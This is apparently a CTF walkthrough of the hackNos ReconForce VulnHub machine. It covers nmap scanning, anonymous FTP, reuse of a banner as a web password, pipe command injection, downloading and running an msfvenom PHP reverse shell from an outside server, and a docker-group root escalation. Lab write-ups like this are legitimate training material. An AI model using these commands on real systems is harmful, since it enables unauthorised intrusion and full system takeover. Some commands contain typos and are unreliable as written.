hackNos Reconforce Walkthrough Vulhub CTF Machine is create by Rahul Gehlaut
Download hackNos: ReconForce VM here
Today we are solving hackNos ReconForce is Created by Rahul Gehlaut
Walkthrough
Our First Step is a network Scanning Finding our target IP address Today I use netdiscover for All network scanning
netdiscover

After finding our target IP address Our next step is to scan our target with Nmap.
nmap -A 192.168.1.6

Enumeration
we see the Nmap scan target machine three-port are open 21/ftp, 22/ssh, and 80/http service and the target is allowed, anonymous user login
FTP login
I go to ftp login and connecting with ftp username and ftp password and ls command to see target directory and the target directory is empty and we see the target ftp banner Security@hackNos
ftp 192.168.1.6
- username: ftp
- password; ftp
I try the banner for Troubleshoot login page password field and try command username admin and us successful login with 5ecure page.
http://192.168.1.6

- web username: admin
- web pass: Security@hackNos

After trying many attempts our target is vulnerable command injection I run the ID command and before our command using ( | pipe ) and hit enter.
id

our browser is show response next page and we see the target uid and guid.

Msfvenom
Without wasting our time I go to create a php reverse shell with msfvenom raw formate and copy a shellcode and paste shell.php file.
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.19 lport=4545 -f raw

Now downloading our shell payload target machine I start our python local server port 99 downloads the payload wget command
|wget http://192.168.1.19:99/shell.php

before executing our payload I start our msfconsole multi handler payload listener specified lport and lhost
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lport 4545
set lhost 0.0.0.0
run

Executing our payload with using pip and type php our shell name
|php shell.php

we see the msfconsole window we got a reverse connection target machine now I run the shell command and we see the blank shell now import python3 for proper shell
python -c 'import pty;pty.spwan("/bin/bash")'
id

After enumeration target directory I go to target home directory and see a user recon I am trying to changing our current user shell with su switch user command and try the password 5ecure login page
cd /home
su recon
After loning with recon user I run the ID command and see the user group name we see the user recon with docker group.
id
cat user.txt

Privilege Escalation
I install virtual image ubuntu with docker
docker run ubuntu
After installing our ubuntu image I run the command docker run ( -it interactive mode ) and -v ( verbose ) and our mounting point or our image file name
docker run-it -v /root:/mnt ubuntu

we see the root shell docker virtual image ubuntu and I changing our directory mounting point /mnt and type ls command to see all file /mnt directory we see the target root directory and our last root flag cat command to open the file
cd /mnt
ls
cat root.txt

